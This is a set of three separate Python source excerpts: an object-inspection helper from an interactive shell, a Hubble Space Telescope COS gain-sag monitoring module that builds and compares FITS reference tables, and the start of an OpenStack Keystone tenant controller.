ds += "\nDocstring:\n" + obj.__doc__
else:
ds = getdoc(obj)
if ds is None:
ds = '<no docstring>'
if formatter is not None:
ds = formatter(ds)
# store output in a dict, we initialize it here and fill it as we go
out = dict(name=oname, found=True, isalias=isalias, ismagic=ismagic)
string_max = 200 # max size of strings to show (snipped if longer)
shalf = int((string_max -5)/2)
if ismagic:
obj_type_name = 'Magic function'
elif isalias:
obj_type_name = 'System alias'
else:
obj_type_name = obj_type.__name__
out['type_name'] = obj_type_name
try:
bclass = obj.__class__
out['base_class'] = str(bclass)
except: pass
# String form, but snip if too long in ? form (full in ??)
if detail_level >= self.str_detail_level:
try:
ostr = str(obj)
str_head = 'string_form'
if not detail_level and len(ostr)>string_max:
ostr = ostr[:shalf] + ' <...> ' + ostr[-shalf:]
ostr = ("\n" + " " * len(str_head.expandtabs())).\
join(q.strip() for q in ostr.split("\n"))
out[str_head] = ostr
except:
pass
if ospace:
out['namespace'] = ospace
# Length (for strings and lists)
try:
out['length'] = str(len(obj))
except: pass
# Filename where object was defined
binary_file = False
fname = find_file(obj)
if fname is None:
# if anything goes wrong, we don't want to show source, so it's as
# if the file was binary
binary_file = True
else:
if fname.endswith(('.so', '.dll', '.pyd')):
binary_file = True
elif fname.endswith('<string>'):
fname = 'Dynamically generated function. No source code available.'
out['file'] = fname
# reconstruct the function definition and print it:
defln = self._getdef(obj, oname)
if defln:
out['definition'] = self.format(defln)
# Docstrings only in detail 0 mode, since source contains them (we
# avoid repetitions). If source fails, we add them back, see below.
if ds and detail_level == 0:
out['docstring'] = ds
# Original source code for any callable
if detail_level:
# Flush the source cache because inspect can return out-of-date
# source
linecache.checkcache()
source = None
try:
try:
source = getsource(obj, binary_file)
except TypeError:
if hasattr(obj, '__class__'):
source = getsource(obj.__class__, binary_file)
if source is not None:
out['source'] = source.rstrip()
except Exception:
pass
if ds and source is None:
out['docstring'] = ds
# Constructor docstring for classes
if inspect.isclass(obj):
out['isclass'] = True
# reconstruct the function definition and print it:
try:
obj_init = obj.__init__
except AttributeError:
init_def = init_ds = None
else:
init_def = self._getdef(obj_init,oname)
init_ds = getdoc(obj_init)
# Skip Python's auto-generated docstrings
if init_ds == _object_init_docstring:
init_ds = None
if init_def or init_ds:
if init_def:
out['init_definition'] = self.format(init_def)
if init_ds:
out['init_docstring'] = init_ds
# and class docstring for instances:
else:
# First, check whether the instance docstring is identical to the
# class one, and print it separately if they don't coincide. In
# most cases they will, but it's nice to print all the info for
# objects which use instance-customized docstrings.
if ds:
try:
cls = getattr(obj,'__class__')
except:
class_ds = None
else:
class_ds = getdoc(cls)
# Skip Python's auto-generated docstrings
if class_ds in _builtin_type_docstrings:
class_ds = None
if class_ds and ds != class_ds:
out['class_docstring'] = class_ds
# Next, try to show constructor docstrings
try:
init_ds = getdoc(obj.__init__)
# Skip Python's auto-generated docstrings
if init_ds == _object_init_docstring:
init_ds = None
except AttributeError:
init_ds = None
if init_ds:
out['init_docstring'] = init_ds
# Call form docstring for callable instances
if safe_hasattr(obj, '__call__'):
call_def = self._getdef(obj.__call__, oname)
if call_def is not None:
out['call_def'] = self.format(call_def)
call_ds = getdoc(obj.__call__)
# Skip Python's auto-generated docstrings
if call_ds == _func_call_docstring:
call_ds = None
if call_ds:
out['call_docstring'] = call_ds
# Compute the object's argspec as a callable. The key is to decide
# whether to pull it from the object itself, from its __init__ or
# from its __call__ method.
if inspect.isclass(obj):
# Old-style classes need not have an __init__
callable_obj = getattr(obj, "__init__", None)
elif callable(obj):
callable_obj = obj
else:
callable_obj = None
if callable_obj:
try:
args, varargs, varkw, defaults = getargspec(callable_obj)
except (TypeError, AttributeError):
# For extensions/builtins we can't retrieve the argspec
pass
else:
out['argspec'] = dict(args=args, varargs=varargs,
varkw=varkw, defaults=defaults)
return object_info(**out)
def psearch(self,pattern,ns_table,ns_search=[],
ignore_case=False,show_all=False):
"""Search namespaces with wildcards for objects.
Arguments:
- pattern: string containing shell-like wildcards to use in namespace
searches and optionally a type specification to narrow the search to
objects of that type.
- ns_table: dict of name->namespaces for search.
Optional arguments:
- ns_search: list of namespace names to include in search.
- ignore_case(False): make the search case-insensitive.
- show_all(False): show all names, including those starting with
underscores.
"""
#print 'ps pattern:<%r>' % pattern # dbg
# defaults
type_pattern = 'all'
filter = ''
cmds = pattern.split()
len_cmds = len(cmds)
if len_cmds == 1:
# Only filter pattern given
filter = cmds[0]
elif len_cmds == 2:
# Both filter and type specified
filter,type_pattern = cmds
else:
raise ValueError('invalid argument string for psearch: <%s>' %
pattern)
# filter search namespaces
for name in ns_search:
if name not in ns_table:
raise ValueError('invalid namespace <%s>. Valid names: %s' %
(name,ns_table.keys()))
#print 'type_pattern:',type_pattern # dbg
search_result, namespaces_seen = set(), set()
for ns_name in ns_search:
ns = ns_table[ns_name]
# Normally, locals and globals are the same, so we just check one.
if id(ns) in namespaces_seen:
continue
namespaces_seen.add(id(ns))
tmp_res = list_namespace(ns, type_pattern, filter,
ignore_case=ignore_case, show_all=show_all)
search_result.update(tmp_res)
page.page('\n'.join(sorted(search_result)))
|
|
"""Routine to monitor the modal gain in each pixel as a
function of time. Uses COS Cumulative Image (CCI) files
to produce a modal gain map for each time period. Modal gain
maps for each period are collated to monitor the progress of
each pixel(superpixel) with time. Pixels that drop below
a threshold value are flagged and collected into a
gain sag table reference file (gsagtab).
The PHA modal gain threshold is set by global variable MODAL_GAIN_LIMIT.
Allowing the modal gain of a distribution to come within 1 gain bin
of the threshold results in ~8% loss of flux. Within
2 gain bins, ~4%
3 gain bins, ~2%
4 gain bins, ~1%
However, due to the column summing, a 4% loss in a region does not appear as a 4% loss in the extracted spectrum.
"""
__author__ = 'Justin Ely'
__maintainer__ = 'Justin Ely'
__email__ = '[email protected]'
__status__ = 'Active'
import os
import shutil
import time
from datetime import datetime
import glob
import sys
import calcos
from sqlalchemy.engine import create_engine
import logging
logger = logging.getLogger(__name__)
from astropy.io import fits
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from sqlalchemy.sql.functions import concat
from ..database.db_tables import open_settings, load_connection
from ..utils import send_email
from .constants import * #Shut yo face
#------------------------------------------------------------
def main(data_dir, run_regress=False):
""" Main driver for monitoring program.
"""
new_gsagtab = make_gsagtab_db(data_dir, blue=False)
blue_gsagtab = make_gsagtab_db(data_dir, blue=True)
old_gsagtab = get_cdbs_gsagtab()
compare_gsag(new_gsagtab, old_gsagtab, data_dir)
if run_regress:
test_gsag_calibration(new_gsagtab)
else:
print("Regression set skipped")
send_forms(data_dir)
#------------------------------------------------------------
def get_index( gsag, segment, dethv ):
"""
Returns extension index of gsagtab with corresponding
segment and dethv
"""
found_ext = -1
if segment == 'FUVA':
hv_string = 'HVLEVELA'
elif segment == 'FUVB':
hv_string = 'HVLEVELB'
for i,ext in enumerate( gsag[1:] ):
if ext.header['segment'] == segment:
if ext.header[hv_string] == dethv:
found_ext = (i+1)
break
return found_ext
#------------------------------------------------------------
def compare_gsag(new, old, outdir):
"""Compare two gainsag tables to see what has changed
"""
### Needs to be tested ###
logger.debug("Comparing new: {} to old: {}".format(new, old))
if type(new) == str:
new = fits.open(new)
if type(old) == str:
old = fits.open(old)
report_file = open(os.path.join(outdir, 'gsag_report.txt'), 'w')
possible_hv_levels = [0,100] + list(range(100,179))
for segment,hv_keyword in zip( ['FUVA','FUVB'], ['HVLEVELA','HVLEVELB'] ):
new_hv = set( [ ext.header[hv_keyword] for ext in new[1:] if ext.header['SEGMENT'] == segment ] )
old_hv = set( [ ext.header[hv_keyword] for ext in old[1:] if ext.header['SEGMENT'] == segment ] )
only_new_hv = new_hv.difference( old_hv )
only_old_hv = old_hv.difference( new_hv )
both_hv = list( new_hv.union( old_hv ) )
both_hv.sort()
#assert ( len(only_old_hv) == 0 ),'There is an HV value found in the old table that is not found in the new.'
if len(only_old_hv) > 0:
logger.warning('There is an HV value found in the old table that is not found in the new.')
if len( only_new_hv ):
logger.warning("There is at least one new extension, this file should probably be delivered")
report_file.write('There is at least one new extension, you should probably deliver this one \n')
report_file.write('New HV extensions:\n')
report_file.write(','.join( map(str,np.sort( list(only_new_hv) ) ) ) )
report_file.write('\n')
for hv in both_hv:
report_file.write( '#----- %d \n'%(hv) )
old_ext_index = get_index( old, segment, hv )
new_ext_index = get_index( new, segment, hv )
if old_ext_index == -1:
logger.warning('%s %d: not found in old table'%(segment, hv))
continue
if new_ext_index == -1:
logger.warning('%s %d: not found in new table'%( segment, hv ))
continue
else:
old_ext = old[ old_ext_index ]
new_ext = new[ new_ext_index ]
#Get (y,x,mjd) triple for each flagged region. Assumes binning is the same
old_regions = set( [ (y,x,mjd) for x,y,mjd in
zip(old_ext.data['ly'], old_ext.data['lx'], old_ext.data['Date']) ] )
new_regions = set( [ (y,x,mjd) for x,y,mjd in
zip(new_ext.data['ly'], new_ext.data['lx'], new_ext.data['Date']) ] )
#Strip triple down to (y,x) coordinate pair to check just locations
old_coords = set( [ (item[0],item[1]) for item in old_regions ] )
new_coords = set( [ (item[0],item[1]) for item in new_regions ] )
only_old_coords = old_coords.difference( new_coords )
only_new_coords = new_coords.difference( old_coords )
both_coords = old_coords.union( new_coords )
N_old = len(only_old_coords)
N_new = len(only_new_coords)
#pdb.set_trace()
if not (N_old or N_new):
report_file.write( 'Nothing added or deleted \n')
if N_old > 0:
logger.warning(' %s %d: You apparently got rid of %d from the old table'%(segment, hv, N_old))
report_file.write( '%d entries have been removed from the old table. \n'%(N_old) )
report_file.write( '\n'.join( map(str,only_old_coords) ) )
report_file.write('\n\n')
if N_new > 0:
logger.debug('%s %d: You added %d to the new table'%( segment, hv, N_new ))
report_file.write( '%d entries have been added to the new table. \n'%( N_new ) )
report_file.write( '\n'.join( map(str,only_new_coords) ) )
report_file.write('\n\n')
for old_y,old_x,old_mjd in old_regions:
coord_pair = (old_y,old_x)
if coord_pair not in both_coords: continue
###again, may be confusing syntax
for new_y,new_x,new_mjd in new_regions:
if (new_y,new_x) == coord_pair:
break
mjd_difference = old_mjd - new_mjd
if mjd_difference:
logger.debug('MJD difference of {} days at (y,x) {}'.format(mjd_difference, coord_pair))
report_file.write( 'MJD difference of %5.7f days at (y,x): (%d,%d)'%(mjd_difference,coord_pair[0],coord_pair[1]) )
#------------------------------------------------------------
def test_gsag_calibration(gsagtab):
"""Move gsagtab into TEST_DIR and calibrate with CalCOS.
Any datasets that fail calibration will be emailed to the user.
"""
print('#-------------------------#')
print('Calibrating with %s'%(gsagtab))
print('#-------------------------#')
os.environ['testdir'] = TEST_DIR
if not os.path.exists(TEST_DIR):
os.mkdir(TEST_DIR)
shutil.copy( gsagtab ,os.path.join(TEST_DIR,'new_gsag.fits') )
test_datasets = glob.glob( os.path.join(TEST_DIR, '*rawtag_a.fits') )
#Remove products
for ext in ('*_counts*.fits','*_flt*.fits','*_x1d*.fits','*lampflash*.fits','*corrtag*.fits'):
os.system('rm '+TEST_DIR+'/'+ext)
for item in test_datasets:
fits.setval( item,'RANDSEED',value=8675309,ext=0 )
fits.setval( item,'GSAGTAB',value='testdir$new_gsag.fits',ext=0 )
failed_runs = []
for item in test_datasets:
        try:
            status = calcos.calcos(item, outdir=TEST_DIR)
            print("CalCOS exit status is", status)
        except:
            failed_runs.append(item)
        else:
            # Only check the exit status if CalCOS actually ran; this also
            # avoids double-counting a dataset that already failed above.
            if status != 0:
                failed_runs.append(item)
if len(failed_runs):
send_email(subject='GSAGTAB Calibration Error',message='Failed calibration\n\n'+'\n'+'\n'.join(failed_runs) )
###Now run some quick test.
#------------------------------------------------------------
def send_forms(data_dir):
"""Compose CDBS delivery form and email a copy to user
"""
###Needs some modifications
today_obj = datetime.today()
today = str(today_obj.month)+'/'+str(today_obj.day)+'/'+str(today_obj.year)
message = '1-Name of deliverer: Justin Ely\n'
message += ' (other e-mail addresses) [email protected],[email protected],\n'
message += '[email protected],[email protected]\n'
message += '\n'
message += ' 2-Date of delivery: '+today+'\n'
message += '\n'
message += ' 3-Instrument: COS \n'
message += '\n'
message += ' 4-Type of file (bias,pht,etc.): gsag \n'
message += '\n'
message += ' 5-Has HISTORY section in header [0] been updated to describe in detail\n'
message += ' why it is being delivered and how the file was created? (yes/no): yes \n'
message += '\n'
message += ' 6-USEAFTER, PEDIGREE, DESCRIP, and COMMENT have been checked? yes \n'
message += '\n'
message += ' 6a-Was the DESCRIP keyword updated with a summary of why the file was updated or created? \n'
message += ' (yes/no) yes \n'
message += '\n'
message += ' 6b-If the reference files are replacing previous versions, do the new USEAFTER dates \n'
message += ' exactly match the old ones? yes \n'
message += '\n'
message += ' 7-CDBS Verification complete? (fitsverify,certify,etc.): yes \n'
message += '\n'
message += ' 8-Should these files be ingested in the OPUS, DADS and CDBS databases? yes \n'
message += ' (if not indicate it clearly which ones):\n'
message += '\n'
message += ' 8a-If files are synphot files, should they be delivered to ETC? N/A\n'
message += '\n'
message += ' 9-Files run through CALXXX or SYNPHOT in the IRAF version of STSDAS and the IRAF* \n'
message += ' version used by the Archive pipeline? (yes/no): yes \n'
message += ' List the versions used: CalCOS v 2.18.5 \n'
message += '\n'
message += ' 10-Does it replace an old reference file? (yes/no): yes \n'
message += '\n'
message += ' 10a-If yes, which one? \n'
message += ' (If the file being replaced is bad, and should not be used with any data, please\n'
message += ' indicate this here.)\n'
message += '\n'
message += ' 11- What is the level of change of the file? (e.g. compared to old file it\n'
message += ' could be: SEVERE, MODERATE, TRIVIAL, 1\%, 5\% etc.): SEVERE\n'
message += '\n'
message += ' 11a-If files are tables, please indicate exactly which rows have changed. Show output \n'
message += ' of compare_table.pro.\n'
message += ' Table was compared to the previous by the compare_gsag function in gsag.py as part\n'
message += ' of the monitor.py routine monitoring program. This function tests if any HV extensions \n'
message += ' are added or removed, and if individual flagged regions have changed in each HV extension. \n'
message += ' A summary difference report is generated and checked to ensure all changes are desired, along\n'
message += ' with follow-up graphical representations for the table impact on data. \n'
message += '\n'
    message += ' 12-Please indicate which modes (e.g. all the STIS, FUVMAMA, E140L modes) are affected by the \n'
message += ' changes in the file. \n'
message += ' All COS FUV modes are affected by this file. \n'
message += '\n'
message += ' 13-Description of how the files were "tested" for correctness: CalCOS v 2.18.5 was run \n'
message += ' on a test suite of data to ensure no calibration errors were introduced with this file. \n'
message += ' Additionally, the regions flagged in this file have been overplotted to modal gain maps\n'
message += ' of every DETHV level for each week since operations began to ensure that flagged regions\n'
message += ' always overlay areas of low modal gain\n'
message += '\n'
message += ' 14-Additional Considerations: \n'
message += '\n'
message += ' 15-Reason for delivery: New regions have been identified as "bad" and need to be flagged and \n'
message += ' removed in the final extracted spectra.\n'
message += '\n '
message += '16-Disk location and name of files:\n'
initial_dir = os.getcwd()
os.chdir( data_dir )
message += os.getcwd()+'\n'
here = os.getcwd()
os.system('ls -la gsag_%s.fits > tmp.txt'%(TIMESTAMP) )
tmp = open('tmp.txt','r')
for line in tmp.readlines():
message += line
os.remove('tmp.txt')
delivery_form = open( os.path.join( data_dir, 'deliveryform.txt'),'w' )
delivery_form.write(message)
try:
send_email(subject='COS GSAGTAB Delivery Form',message=message)
except:
logger.warning("could not send delivery form")
#------------------------------------------------------------
def get_coords(txt):
"""Grabs coordinates from flagged bad txt file
"""
coords = []
lines = []
try:
lines = np.genfromtxt(txt, dtype=None, skiprows=2)
coords = [(line[0],line[1]) for line in lines]
except:
pass
return coords,lines
#------------------------------------------------------------
def populate_down(gsag_file):
"""Copies found locations from one HV level to each lower
HV level if the coords have not already been flagged.
    A region will always be flagged at the MJD found in that
HV setting, if it has been found. Else, the MJD will be
the time when the region was flagged in the higher HV
setting. In the event we go back down to a lower voltage,
and a region is newly flagged as bad in that HV, it is
possible that the MJD would change from one gsagtab to
the next. This does not pose a problem for data as no
data will have been taken at the lower HV in the
intervening time.
"""
print('#---------------------------------------------#')
print('Populating flagged regions to lower HV settings')
print('#---------------------------------------------#')
gsagtab = fits.open(gsag_file)
for segment,hv_keyword in zip( ['FUVA','FUVB'], ['HVLEVELA','HVLEVELB'] ):
all_hv = [ (ext.header[hv_keyword],i+1) for i,ext in enumerate(gsagtab[1:]) if ext.header['segment'] == segment ]
all_hv.sort()
for current_dethv,current_ext in all_hv:
current_lines = [ tuple(line) for line in gsagtab[current_ext].data[0].array ]
current_coords= [ (line[1],line[2]) for line in current_lines ]
N_changes = 0
for higher_dethv,higher_ext in all_hv:
if not (higher_dethv > current_dethv):
continue
higher_lines = [ tuple(line) for line in gsagtab[higher_ext].data[0].array ]
higher_coords= [ (line[1],line[2]) for line in higher_lines ]
for coord, line in zip(higher_coords,higher_lines):
if not (coord in current_coords):
# If coordinate from higher HV is not in current HV, append
current_lines.append( line )
current_coords.append( (line[1],line[2]) )
N_changes += 1
else:
                        # If the coordinate from the higher HV is already in the current HV,
# check to see if MJD is earlier. If yes, take new value.
# MJD is first element in tuple e.g. line[0]
index = current_coords.index( coord )
current_line = current_lines[index]
if line[0] < current_line[0]:
current_lines[ index ] = line
print(('--Earlier time found',line[0],'-->',current_line[0]))
N_changes += 1
if N_changes:
print(('Updating %s/%d ext:%d with %d changes'%(segment,current_dethv,current_ext,N_changes)))
current_lines.sort()
date = [ line[0] for line in current_lines ]
lx = [ line[1] for line in current_lines ]
ly = [ line[2] for line in current_lines ]
dx = [ line[3] for line in current_lines ]
dy = [ line[4] for line in current_lines ]
dq = [ line[5] for line in current_lines ]
gsagtab[current_ext] = gsagtab_extension(date, lx, dx, ly, dy, dq, current_dethv, hv_keyword, segment)
else:
print(('No Changes to %s/%d ext:%d '%(segment,current_dethv,current_ext)))
gsagtab.writeto(gsag_file,clobber=True)
#------------------------------------------------------------
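# Illustrative sketch (not part of the original module): the core rule of
# populate_down() above on toy data, i.e. copy regions flagged at a higher HV
# down to a lower HV and keep the earliest MJD when both levels flag the same
# (lx, ly) coordinate.
def _example_populate_down_rule():
    lower = {(100, 50): 56000.0}                           # (lx, ly) -> mjd
    higher = {(100, 50): 55800.0, (200, 80): 56100.0}
    for coord, mjd in higher.items():
        if coord not in lower or mjd < lower[coord]:
            lower[coord] = mjd
    assert lower == {(100, 50): 55800.0, (200, 80): 56100.0}
    return lower
#------------------------------------------------------------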
def gsagtab_extension(date, lx, dx, ly, dy, dq, dethv, hv_string, segment):
"""Creates a properly formatted gsagtab table from input columns
"""
lx = np.array(lx)
ly = np.array(ly)
dx = np.array(dx)
dy = np.array(dy)
dq = np.array(dq)
date_col = fits.Column('DATE','D','MJD',array=date)
lx_col = fits.Column('LX','J','pixel',array=lx)
dx_col = fits.Column('DX','J','pixel',array=dx)
ly_col = fits.Column('LY','J','pixel',array=ly)
dy_col = fits.Column('DY','J','pixel',array=dy)
dq_col = fits.Column('DQ','J','',array=dq)
tab = fits.TableHDU.from_columns([date_col,lx_col,ly_col,dx_col,dy_col,dq_col])
tab.header.add_comment(' ',after='TFIELDS')
tab.header.add_comment(' *** Column formats ***',after='TFIELDS')
tab.header.add_comment(' ',after='TFIELDS')
tab.header.set(hv_string, dethv, after='TFIELDS',comment='High voltage level')
tab.header.set('SEGMENT', segment, after='TFIELDS')
tab.header.add_comment(' ',after='TFIELDS')
tab.header.add_comment(' *** End of mandatory fields ***',after='TFIELDS')
tab.header.add_comment(' ',after='TFIELDS')
return tab
#------------------------------------------------------------
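# Illustrative sketch (not part of the original module): building a
# placeholder extension with a single zero-extent region at (0,0), the same
# pattern make_gsagtab()/make_gsagtab_db() use below when an HV level has no
# flagged regions. The HV level 167 is just a hypothetical example value.
def _example_empty_gsag_extension():
    return gsagtab_extension(date=[0], lx=[0], dx=[0], ly=[0], dy=[0],
                             dq=[8192], dethv=167, hv_string='HVLEVELA',
                             segment='FUVA')
#------------------------------------------------------------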
def date_string( date_time ):
""" Takes a datetime object and returns
a pedigree formatted string.
"""
day = str(date_time.day)
month = str(date_time.month)
year = str(date_time.year)
if len(day) < 2:
day = '0' + day
if len(month) < 2:
month = '0' + month
return day + '/' + month + '/' + year
#------------------------------------------------------------
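# Illustrative sketch (not part of the original module): date_string()
# zero-pads the day and month to the DD/MM/YYYY form used in the PEDIGREE
# keyword (e.g. 'INFLIGHT 25/05/2009 ...').
def _example_date_string():
    assert date_string(datetime(2009, 5, 1)) == '01/05/2009'
    return date_string(datetime.now())
#------------------------------------------------------------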
def make_gsagtab():
"""Create GSAGTAB from flagged locations.
Grabs txt files of flagged bad regions from MONITOR_DIR
and combines them into a gsagtab.
Parameters
----------
None
    Returns
    -------
    out_fits : str
        Path to the new gsagtab.
Products
--------
new_gsagtab.fits
"""
logger.info('Making new GSAGTAB')
out_fits = os.path.join(MONITOR_DIR,'gsag_%s.fits'%(TIMESTAMP) )
input_list = glob.glob(os.path.join(MONITOR_DIR,'flagged_bad_??_cci_???.txt'))
input_list.sort()
#Populates regions found in HV == X, Segment Y, to any
#extensions of lower HV for same segment.
hdu_out=fits.HDUList(fits.PrimaryHDU())
date_time = str(datetime.now())
date_time = date_time.split()[0]+'T'+date_time.split()[1]
hdu_out[0].header['DATE'] = (date_time,'Creation UTC (CCCC-MM-DD) date')
hdu_out[0].header['TELESCOP'] = 'HST'
hdu_out[0].header['INSTRUME'] = 'COS'
hdu_out[0].header['DETECTOR'] = 'FUV'
hdu_out[0].header['COSCOORD'] = 'USER'
hdu_out[0].header['VCALCOS'] = '2.0'
hdu_out[0].header['USEAFTER'] = 'May 11 2009 00:00:00'
today_string = date_string(datetime.now())
hdu_out[0].header['PEDIGREE'] = 'INFLIGHT 25/05/2009 %s'%(today_string)
hdu_out[0].header['FILETYPE'] = 'GAIN SAG REFERENCE TABLE'
descrip_string = 'Gives locations of gain-sag regions as of %s'%( str(datetime.now().date() ))
while len(descrip_string) < 67:
descrip_string += '-'
hdu_out[0].header['DESCRIP'] = descrip_string
hdu_out[0].header['COMMENT'] = "= 'This file was created by J. Ely'"
hdu_out[0].header.add_history('Flagged region source files can be found here:')
for item in input_list:
hdu_out[0].header.add_history('%s'%(item))
hdu_out[0].header.add_history('')
hdu_out[0].header.add_history('Flagged regions in higher voltages have been backwards populated')
hdu_out[0].header.add_history('to all lower HV levels for the same segment.')
hdu_out[0].header.add_history('')
hdu_out[0].header.add_history('A region will be flagged as bad when the detected')
hdu_out[0].header.add_history('flux is found to drop by 5%. This happens when')
hdu_out[0].header.add_history('the measured modal gain of a region falls to ')
hdu_out[0].header.add_history('%d given current lower pulse height filtering.'%(MODAL_GAIN_LIMIT) )
possible_hv_strings = ['000','100'] + list(map(str,list(range(142,179))))
for segment_string in [FUVA_string,FUVB_string]:
for hv_level_st in possible_hv_strings:
hv_level = int( hv_level_st )
if segment_string == FUVA_string:
segment = 'FUVA'
HVLEVEL_string ='HVLEVELA'
elif segment_string == FUVB_string:
segment = 'FUVB'
HVLEVEL_string = 'HVLEVELB'
infile = os.path.join( MONITOR_DIR, "flagged_bad_%s_%s.txt"%(segment_string,hv_level_st) )
date = []
lx = []
dx = []
ly = []
dy = []
dq = []
if os.path.exists( infile ):
txt = open(infile,'rU')
txt.readline()
txt.readline()
for line in txt.readlines():
line = line.strip().split()
for i in range(len(line)):
line[i] = float(line[i])
if len(line) != 5:
print('Skipping')
continue
lx.append( line[0] )
dx.append( line[1] )
ly.append( line[2] )
dy.append( line[3] )
date.append( line[4] )
dq.append( 8192 )
if not len(lx):
#Extension tables cannot have 0 entries, a
#region of 0 extent centered on (0,0) is
#sufficient to prevent CalCOS crash.
date.append( 0 )
lx.append( 0 )
ly.append( 0 )
dx.append( 0 )
dy.append( 0 )
dq.append( 8192 )
tab = gsagtab_extension( date,lx,dx,ly,dy,dq,hv_level,HVLEVEL_string,segment)
hdu_out.append(tab)
hdu_out.writeto(out_fits,clobber=True)
print(('WROTE: GSAGTAB to %s'%(out_fits)))
return out_fits
#------------------------------------------------------------
def in_boundary(segment, ly, dy):
boundary = {'FUVA': 493, 'FUVB': 557}
padding = 4
boundary_pix = set(np.arange(boundary[segment]-padding,
boundary[segment]+padding+1))
affected_pix = set(np.arange(ly, ly+dy+1))
if affected_pix.intersection(boundary_pix):
return True
return False
#------------------------------------------------------------
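# Illustrative sketch (not part of the original module): a region is kept out
# of the blue-mode table when any of its rows fall within +/-4 pixels of the
# segment boundary (row 493 for FUVA, 557 for FUVB).
def _example_in_boundary():
    assert in_boundary('FUVA', 486, 4)        # rows 486-490 touch the 489-497 window
    assert not in_boundary('FUVA', 480, 5)    # rows 480-485 stay clear of it
#------------------------------------------------------------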
def make_gsagtab_db(out_dir, blue=False):
"""Create GSAGTAB from flagged locations.
Grabs txt files of flagged bad regions from MONITOR_DIR
and combines them into a gsagtab.
Parameters
----------
None
Returns
-------
None
Products
--------
new_gsagtab.fits
"""
out_fits = os.path.join(out_dir, 'gsag_%s.fits'%(TIMESTAMP))
#Populates regions found in HV == X, Segment Y, to any
#extensions of lower HV for same segment.
hdu_out=fits.HDUList(fits.PrimaryHDU())
date_time = str(datetime.now())
date_time = date_time.split()[0]+'T'+date_time.split()[1]
hdu_out[0].header['DATE'] = (date_time, 'Creation UTC (CCCC-MM-DD) date')
hdu_out[0].header['TELESCOP'] = 'HST'
hdu_out[0].header['INSTRUME'] = 'COS'
hdu_out[0].header['DETECTOR'] = 'FUV'
hdu_out[0].header['COSCOORD'] = 'USER'
hdu_out[0].header['VCALCOS'] = '2.0'
hdu_out[0].header['USEAFTER'] = 'May 11 2009 00:00:00'
hdu_out[0].header['CENWAVE'] = 'N/A'
today_string = date_string(datetime.now())
hdu_out[0].header['PEDIGREE'] = 'INFLIGHT 25/05/2009 %s'%(today_string)
hdu_out[0].header['FILETYPE'] = 'GAIN SAG REFERENCE TABLE'
descrip_string = 'Gives locations of gain-sag regions as of %s'%( str(datetime.now().date() ))
while len(descrip_string) < 67:
descrip_string += '-'
hdu_out[0].header['DESCRIP'] = descrip_string
hdu_out[0].header['COMMENT'] = ("= 'This file was created by J. Ely'")
hdu_out[0].header.add_history('Flagged regions in higher voltages have been backwards populated')
hdu_out[0].header.add_history('to all lower HV levels for the same segment.')
hdu_out[0].header.add_history('')
hdu_out[0].header.add_history('A region will be flagged as bad when the detected')
hdu_out[0].header.add_history('flux is found to drop by 5%. This happens when')
hdu_out[0].header.add_history('the measured modal gain of a region falls to ')
hdu_out[0].header.add_history('%d given current lower pulse height filtering.'%(MODAL_GAIN_LIMIT) )
possible_hv_strings = ['000', '100'] + list(map(str, list(range(142, 179))))
SETTINGS = open_settings()
Session, engine = load_connection(SETTINGS['connection_string'])
connection = engine.connect()
results = connection.execute("""SELECT DISTINCT segment FROM gain WHERE concat(segment,x,y) IS NOT NULL""")
segments = [item[0] for item in results]
for seg in segments:
hvlevel_string = 'HVLEVEL' + seg[-1].upper()
for hv_level in possible_hv_strings:
date = []
lx = []
dx = []
ly = []
dy = []
dq = []
hv_level = int(hv_level)
results = connection.execute("""SELECT DISTINCT x,y
FROM flagged WHERE segment='%s'
and dethv>='%s'
and concat(x,y) IS NOT NULL
"""
%(seg, hv_level)
)
coords = [(item[0], item[1]) for item in results]
for x, y in coords:
results = connection.execute("""SELECT MJD
FROM flagged
WHERE segment='%s'
AND x='%s'
AND y='%s'
AND dethv>='%s'
AND concat(x,y) IS NOT NULL
"""
%(seg, x, y, hv_level)
)
flagged_dates = [item[0] for item in results]
if len(flagged_dates):
bad_date = min(flagged_dates)
else:
continue
if blue and in_boundary(seg, y*Y_BINNING, Y_BINNING):
logger.debug("Excluding for blue modes: {} {} {}".format(seg, y*Y_BINNING, Y_BINNING))
continue
lx.append(x*X_BINNING)
dx.append(X_BINNING)
ly.append(y*Y_BINNING)
dy.append(Y_BINNING)
date.append(bad_date)
dq.append(8192)
if not len(lx):
#Extension tables cannot have 0 entries, a
#region of 0 extent centered on (0,0) is
#sufficient to prevent CalCOS crash.
lx.append(0)
ly.append(0)
dx.append(0)
dy.append(0)
date.append(0)
dq.append(8192)
logger.debug('found {} bad regions'.format(len(date)))
tab = gsagtab_extension(date, lx, dx, ly, dy, dq, hv_level, hvlevel_string, seg)
hdu_out.append(tab)
if blue:
out_fits = out_fits.replace('.fits', '_blue.fits')
hdu_out[0].header['CENWAVE'] = 'BETWEEN 1055 1097'
descrip_string = 'Blue-mode gain-sag regions as of %s'%(str(datetime.now().date()))
while len(descrip_string) < 67:
descrip_string += '-'
hdu_out[0].header['DESCRIP'] = descrip_string
hdu_out.writeto(out_fits, clobber=True)
logger.info('WROTE: GSAGTAB to %s'%(out_fits))
return out_fits
#------------------------------------------------------------
def get_cdbs_gsagtab():
"""Retrieve most recently delivered GSAGTAB from CDBS
for comparison with the one just made.
"""
gsag_tables = glob.glob(os.path.join(os.environ['lref'], '*gsag.fits'))
creation_dates = np.array([fits.getval(item, 'DATE') for item in gsag_tables])
current_gsagtab = gsag_tables[creation_dates.argmax()]
return current_gsagtab
#------------------------------------------------------------
|
|
# Copyright 2013 Metacloud, Inc.
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Workflow Logic the Assignment service."""
import copy
import uuid
import six
from six.moves import urllib
from keystone.common import controller
from keystone.common import dependency
from keystone import config
from keystone import exception
from keystone.i18n import _
from keystone.openstack.common import log
CONF = config.CONF
LOG = log.getLogger(__name__)
@dependency.requires('assignment_api', 'identity_api', 'token_api')
class Tenant(controller.V2Controller):
@controller.v2_deprecated
def get_all_projects(self, context, **kw):
"""Gets a list of all tenants for an admin user."""
if 'name' in context['query_string']:
return self.get_project_by_name(
context, context['query_string'].get('name'))
self.assert_admin(context)
